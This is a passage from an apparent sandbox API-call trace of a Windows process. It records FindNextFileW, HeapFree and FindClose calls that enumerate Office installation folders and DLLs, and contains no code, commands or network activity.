nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu", cAlternateFileName="")) returned 1 [0163.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.422] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="EventSource.dll", cAlternateFileName="EVENTS~1.DLL")) returned 1 [0163.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.424] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr", cAlternateFileName="")) returned 1 [0163.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.426] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x675bda6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gl", cAlternateFileName="")) returned 1 [0163.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.427] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he", cAlternateFileName="")) returned 1 [0163.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.429] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hi", cAlternateFileName="")) returned 1 [0163.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.431] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr", cAlternateFileName="")) returned 1 [0163.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.433] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu", cAlternateFileName="")) returned 1 [0163.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.435] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="id", cAlternateFileName="")) returned 1 [0163.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.436] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="it", cAlternateFileName="")) returned 1 [0163.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.438] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja", cAlternateFileName="")) returned 1 [0163.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.440] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kk", cAlternateFileName="")) returned 1 [0163.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.442] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko", cAlternateFileName="")) returned 1 [0163.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.444] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lt", cAlternateFileName="")) returned 1 [0163.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.446] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lv", cAlternateFileName="")) returned 1 [0163.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.448] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80afe67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80afe67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80afe67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xee40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mashupcompression.dll", cAlternateFileName="MASHUP~1.DLL")) returned 1 [0163.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.451] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nl", cAlternateFileName="")) returned 1 [0163.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.453] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="no", cAlternateFileName="")) returned 1 [0163.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.454] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6daa8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Office.dll", cAlternateFileName="")) returned 1 [0163.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.456] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0163.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.457] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0163.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.459] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro", cAlternateFileName="")) returned 1 [0163.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.708] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru", cAlternateFileName="")) returned 1 [0163.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.711] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk", cAlternateFileName="")) returned 1 [0163.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.712] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl", cAlternateFileName="")) returned 1 [0163.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.714] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45c38, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sqmapi_x64.dll", cAlternateFileName="SQMAPI~1.DLL")) returned 1 [0163.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.715] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn", cAlternateFileName="")) returned 1 [0163.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.717] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0163.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.719] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa25d2ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv", cAlternateFileName="")) returned 1 [0163.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.721] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6cde4ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6cde4ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6cde4ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c2b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System.Spatial.NetFX35.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0163.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.722] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x453c2a7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr", cAlternateFileName="")) returned 1 [0163.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.724] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uk", cAlternateFileName="")) returned 1 [0163.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.726] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4abf9f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4abf9f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vi", cAlternateFileName="")) returned 1 [0163.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.728] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANS", cAlternateFileName="")) returned 1 [0163.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.730] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANT", cAlternateFileName="")) returned 1 [0163.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.732] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-HANT", cAlternateFileName="")) returned 0 [0163.732] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0163.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0163.732] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x895576a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x895576a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 0 [0163.732] FindClose (in: hFindFile=0x727548 | out: hFindFile=0x727548) returned 1 [0163.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0163.732] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2283d0f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3688, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSOSEC.DLL", cAlternateFileName="")) returned 1 [0163.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0163.734] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Power View Excel Add-in", cAlternateFileName="POWERV~1")) returned 1 [0163.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0163.736] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, 